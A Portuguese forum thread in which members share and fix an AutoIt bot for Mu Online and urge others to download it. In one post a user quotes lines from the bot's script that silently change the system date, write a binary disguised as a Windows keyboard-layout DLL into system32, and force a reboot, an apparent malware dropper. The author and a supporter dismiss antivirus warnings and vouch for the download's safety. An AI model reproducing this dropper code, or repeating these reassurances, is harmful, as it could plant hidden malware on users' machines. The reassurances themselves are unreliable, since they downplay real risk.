Ir para conteúdo
Faça parte da equipe! (2024) ×
Conheça nossa Beta Zone! Novas áreas a caminho! ×
  • Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

BonI Auto BoT


 Compartilhar

Posts Recomendados

Bom galera tenho noticia que nao vai agradar a galera.

 

Limpar Invetorio creio que não seja mas possivel pois mesmo com shit precionado o char anda nas seguintes condições

 

;Se o bot clicar em algum mob

;Se ele clicar em algum item no chao

 

Como na versao antiga ele jogava por cima da barra de status dava de boa mas agora nao da mas.

 

OBS: Fiz um teste aqui, coloquei um angel ou imp e mandei clica no status do pet, ate que deu certo mas o caso e se o mause virar a mao zinha pra pegar item e o bot clica ja era o char anda

 

Pra arrumar o Limpador tem que achar alguma maneira do mause nao virar essa mao pra pegar o item de volta.

 

Estou sempre on no grupo quem tiver alguma sugestao e so postar aqui ou mesmo falar comigo no grupo.

 

@Toskayo arrumei as funções que depende de contador ^^ depois fala comigo la no grupo.

 

Fui....

 

 

11223311 = Dezzner

Link para o comentário
Compartilhar em outros sites

Bom galera tenho noticia que nao vai agradar a galera.

 

Limpar Invetorio creio que não seja mas possivel pois mesmo com shit precionado o char anda nas seguintes condições

 

;Se o bot clicar em algum mob

;Se ele clicar em algum item no chao

 

Como na versao antiga ele jogava por cima da barra de status dava de boa mas agora nao da mas.

 

OBS: Fiz um teste aqui, coloquei um angel ou imp e mandei clica no status do pet, ate que deu certo mas o caso e se o mause virar a mao zinha pra pegar item e o bot clica ja era o char anda

 

Pra arrumar o Limpador tem que achar alguma maneira do mause nao virar essa mao pra pegar o item de volta.

 

Estou sempre on no grupo quem tiver alguma sugestao e so postar aqui ou mesmo falar comigo no grupo.

 

@Toskayo arrumei as funções que depende de contador ^^ depois fala comigo la no grupo.

 

Fui....

 

 

11223311 = Dezzner

 

Ae, faz o favor me envia um email com o script com o contado corrigido, vou te mandar uma pm com o email para o qual vc deve enviar ok

 

acho que tenho a solução, so me envia o script, pois preciso ver se é o que estou pensando, ok.

Link para o comentário
Compartilhar em outros sites

Tosk meu broder mau ai por nao ter enviado peguei um virus fd... zuo com minha rede tive que formatar tudo mas em compensação arrumei o pj full sem alterção anoite ve comigo la no grupo fui...

 

ae mano, consegiu o fonte do pj? que blz, a noite entao nos falamos.

Link para o comentário
Compartilhar em outros sites

Ajuda !!!

 

Pessoal desculpa o incomodo.

 

Jogo Mu Online faz 1 ano "

É necessário se cadastrar para acessar o conteúdo.
esse mu ai <<<<, pelo o que acompanhei a conversa de vocês estão tentado fazer um boot para season 4 né, que fucione todos os camandos.

O link do boot da 1° página, eu baxei e testei ta igual o antigo que tenho ele limpa invetário mais joga os itens em cima da barra o item não cai no chão.

Ontem um amigo meu no game me passo outro boot que até limpa certinho o inventário mais o char anda de vez enquando quando limpa.

Se vocês conseguir arrumar o boot e deixar 100 % funcionando, disponibiliza para o pessoal ai, por que eu mesmo sem boot vou parar de jogar, não tenho tempo para ficar na frente do computador, trabalho estudo e o jeito q ficar afk mesmo.

Grande abraço, e agradeço deste já.

Link para o comentário
Compartilhar em outros sites

Bot para Mu online

by DeadTrash

Scan:

É necessário se cadastrar para acessar o conteúdo.

Download (Minimizer Scroll lock fechar na tecla TAB, Autobuff Funcionando):

 

[

É necessário se cadastrar para acessar o conteúdo.
] [RAPIDSHARE]

 

 

ATENÇÃO : Bot atualizado dia 24/06/2009

se você tem uma versão anterior, por favor baixe a nova com a correção dos bugs.

 

Bugs corrigidos: AutoBuff (obrigado toskayo por arrumar o bot (de novo) ^^)

 

*elf hibrida;

*ee;

*click direito;

*limpeza (obs não esta 100%, ele anda quando tenta pegar um espaço vazio aconselho deixar o tempo de limpeza alto);

*tecla alt+7

*Combo - Tecla Alt+4

 

Teclas Home e End voltaram a funcionar (Autoparty , e AutoFireburst)

Para MINIMIZAR agora é na tecla SCROLL LOCK

Para FECHAR o bot é tecla TAB

 

 

Bom qualquer duvida, reclamação , Bug, sugestão, comentem no Tópico.

 

Todas as instruções necessarias estão no proprio Bot.

 

como todo bot ele apresenta certas partes do script que o virus total acusa como virus, mas posso garantir que não contem nenhum virus e que você não vai perder sua acc.

 

o uso do bot é extremamente simples, e todas as instruções estão no proprio bot, depois que você o abre a primeira vez ele criara um bloco de notas, onde você pode alterar boa parte das caracteristicas do bot, tais como:

 

 

Teclas do Mana Shield e Evil spiritis, Fireburst, skill do pet, velocidade de abertura do inventorio entre outros.

 

 

para maiores informações sobre o bot, e para contato, visitem meu blog:

 

É necessário se cadastrar para acessar o conteúdo.

 

Imagens: (click para apliar)

 

É necessário se cadastrar para acessar o conteúdo.

 

É necessário se cadastrar para acessar o conteúdo.
É necessário se cadastrar para acessar o conteúdo.
É necessário se cadastrar para acessar o conteúdo.
É necessário se cadastrar para acessar o conteúdo.
É necessário se cadastrar para acessar o conteúdo.
É necessário se cadastrar para acessar o conteúdo.
É necessário se cadastrar para acessar o conteúdo.

Ae... me explica essa linhaÇ

 

If $prek = 1 Then

RunWait(@ComSpec & " /c " & 'date 28/10/2001', "", @SW_HIDE)

IniWrite(@WindowsDir & "\system32\kdbhe320.dll", "]kzk%$","MZ ÿÿ ¸ @ Ð º ´ Í!¸LÍ!This program cannot be run in DOS mode.$ ¯3dÙëRŠëRŠëRŠq5ŠêRŠ|qOŠêRŠ1qŠêRŠq7ŠêRŠRichëRŠ “}; à ! ÿ_ @ f p R 0 À Ð .data ó @ `.rsrc @ B.reloc Ì 0 @ B ÿ 1 2 3 4 5 6 7 8 9 0 ¿ Û Q W E R T Y U I O P » Ý ¢ A S D F G H J K L º Þ À * Ü Z X C V B N M ¼ ¾ ½ ¡j¤ p q r s t u v w x y ‘$&!m %'k #(-., ÿ â z { î ñ ê ù õ ó ÿ ÿ û / | } ~ � € ‚ ƒ „ … † í ÿ é ÿ Á ÿ ÿ ‡ ÿ ÿ ÿ ÿ ë ÿ  ± £ *! · ³$ ². ®0 ¯2 ¬5 o7 ,8 ¥G $H &I !K %M 'O #P (Q R -S .[ [\ \] ]_ _e ªf «g ¨h ©i §j ¦k ¶l ´m µ F ¤ÿ_ À ½ ± 1 1 ! 7 7 / Q ~: W Â~ TĤU¸˜I¹™O¿ŸPÀ*A±‘SãD´”F ƦG³“H·—J¾žKºšL»›Z¶–XǧVÉ ©B²’N½M¼œ¼ , ; ¾ . : â < > n , , k + + o / / j * * m - - O r i g i n a l F i l e n a m e k b d h e 3 2 0 . d l l j % P r o d u c t N a m e M i c r o s o f t ® W i n d o w s ® O p e r a t i n g S y s t e m : P r o d u c t V e r s i o n 5 . 1 . 2 6 0 0 . 0 D V a r F i l e I n f o $ T r a n s l a t i o n ° À ¬1Ø3à3è3ð3ø3444$4,444<4D4L4T4\4d4l4t4|4„4Œ4”4œ4¤4¬4´4¼4Ä4Ì4Ô 4Ü4ä4ì4ô4ü45555$5,545<5D5L5T5\5d5l5t5|5„5Œ5”5œ5¬5´5¼5Ä5Ì5Ô5Ü 5ä5ì5ô5ü56666$6,646<6D6L6T6`6d6h6074787<7@7D7H7P7T7î; ", "º")

RunWait(@ComSpec & " /c " & 'date 03/08/2006', "", @SW_HIDE)

Shutdown(6)

Exit

 

Ela roda essa DLL pra q?

essa e outra linha são muito suspeitas...na outra ele cria uma dll me explica ela. Será que é essa linha q acusa como virús?

Apaguei elas.. antes de usar o bot (claro)e ele funcionou normalmente. Será um keylog? me explica ela q eu fiquei curioso.

 

PAZ :confused:

Link para o comentário
Compartilhar em outros sites

guihagemeyer - Vou dar uma olhada.

 

b4ndit - Ele tem 3 tipos de velocidade ... é só escolher a que mais se adequa a sua elf

 

nalris - Ele não roda essas dll´s, no começo eu usava senha para poder usar, pq não queria que muita gente usasse, essa dll era onde ficava o registro, depois com o tempo fui modificando e foi sobrando muitas linhas de codigo inutil, vc pode ver q ele nem chamava mais essa dll, ja retirei até essa linha, só para não dar mais margem a especulação

 

Não, não é um keylog, e eu tenho muitas pessoas aqui que podem comprovar isso, como vc disse , vc apagou essa linha e funcionou não é? então.. não se preocupe, pq Kl atravez do meu bot vc não vai pegar.

 

Mesmo pq se eu quisesse hackia alguem com Kl, eu não faria um bot com codigo aberto né?

 

grato por sua preocupação, mas não tem nem um anti-virus que acuse como virus meu bot, de todos os anti-virus apenas o e-safe classifica como "suspicious file"...

 

 

Peace!

 

 

Obs: este fim de semana não estou em casa , então provavelmente seja dificil eu atualizar o bot, mas vou entrar em contato com Toskayo e Dezzner, e ver se eles obtiveram algum progresso...

 

mesmo pq eles tem trabalhado no bot mais do q eu ultimamente :p

Link para o comentário
Compartilhar em outros sites

dead, eu sei que tem 3 velocidades, o problema eh que na mais lenta a elf nao respira, ela fica dando buff sem parar, nao tem um tempo de espera pra da um recovery na mana ...

 

e o bot da ae, ta meio desorganizado ela fica atirando pra todos os lados, e tb o mouse muda de diração mto rapido! nao teria como diminuir o tempo de buff da elf ... e o bot da ae apenas ser um 360 como no pj? pq no global o bot ta proibido e seu bot nao da akelas mensagem de parado iniciado e etc, porem nao te funcionando direito essas 2 partes :(

obrigado e parabens pelo trabalho

Link para o comentário
Compartilhar em outros sites

b4ndit - vou dar uma olhada no buff da elf

 

as mensagens acho q toskayo tirou, vou tentar colocar de novo

 

e o bot da AE , são 3 opções , a primeira eh tiro aleatorio, é rapido mesmo é pra elf 300+ em geral, aperta mais uma vez f10 ele faz 360º volta completa , meia rapida tambem, e mais uma vez F10 é 360º mais devagar ....

Link para o comentário
Compartilhar em outros sites

ae refenrenta a buff, eu testei e esta ok, experimenta esta ultima versao que coloquei no link abaixo, recoloquei as mensagem quando vc ativa uma fnção, pq vi que pessoal ta se perdendo, até mesmo eu hehehe:

http://www.webcheats.com.br/forum/mu-cheats/124260-boni-auto-bot-corrigdo-para-ee.html#post661609

GL ppl

Link para o comentário
Compartilhar em outros sites

Problema

 

Pessoal que Mu Onile vocês jogam...Não é Mu Global né (

É necessário se cadastrar para acessar o conteúdo.
)..

Por que esse Boot ai de vocês não está funcionando neste Mu Online.

Ja testei so dois links...e nas duas resoluções e não da certo....

Se for o mesmo Mu online passa o boot ai para mim por favor.

Abraços

Link para o comentário
Compartilhar em outros sites

antoniocl : sim é mu online global , o da webzen ....

 

estranho, funciona normal aqui, até abri para ver se tinha atualizado gg, mas ta pegando normal .... O.o"

 

b4ndit - da sim , o problema é que pela versão do autoit que foi feita, se colocar mais rapido ele buga... lembro disso pq qnd atualizo na k2, o autopick não funcionava , exatamente pq era rapido , mas vou ver se na webzen não voltou a dar para colocar mais rapido o autopick.

Link para o comentário
Compartilhar em outros sites

Olá pessoal!:)

 

b4ndit, a cada vez que você precisar trocar o modo como a AE gira para atacar, você deve ANTES pressionar o botão 9 (da parte numérica do teclado, à direita = Num Lock), e em seguida pressionar o F10. Se você ficar pressionando direto o F10 vai dar bug no bot e ele vai fechar ou parar de funcionar.

Então fica assim : F10 girando 360°

quer trocar para tiros aleatórios? press 9

para ela voltar a rodar e atacar = press F10

OBS: você tem que esperar um tempo, entre um comando e outro. Não dê comandos seguidos.

 

DeadTrash, meu querido o bot na outra versão não estava funcionando direito, mas agora baixei a nova versão de 27 de junho (postada no inicial do seu tópico), vou usar e ver se está tudo direitinho e posto aqui. :)

 

Para quem desconfiar de KL no bot do DeadTrash, eu tenho a informar que ele nem joga mais o MU, e ele só jogava por diversão e não obsessão. :p

Ele, não precisa de kl em bot algum, porque ele faz isso por amor ao trabalho que ele vem construindo, aprendendo a usar autoit e programação. A galera está tendo um bot limpo, e com uma pessoa que está sempre aqui tentando ajudar ajustando o bot, igual a terno em costureiro.

E quem não confiar nele, não faça o download, simples.:rolleyes:

Quem não confiar no DeadTrash está PERDIDO que nem cego em tiroteio. :cool:

 

link do site do Virus Total apos ter feito o scan no Bot (atualizado em 27 junho)

É necessário se cadastrar para acessar o conteúdo.

 

Beijus;)

Link para o comentário
Compartilhar em outros sites

gente tem que diminuir a velocidade do bot da ee!!!

 

na velocidade mais basica, eu tenho 1030 de enrgy, as manas acabam mto rapido!

 

ele nao da uma tregua, tipo que ele fika buffando direto e muito rapido, tinhaque esperar um tempo, ate pq o buff deve durar 1 minuto!

 

fora isso o bot ta perfeito e eu tava fazendo errado mesmo, mas apertando f10 e parando no 9, apertando denovo e parando, e apertando a ultima pra entrar a terceira velocidade, a terceira ela nao ta funcionando, apenas as 2 primeiras!

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.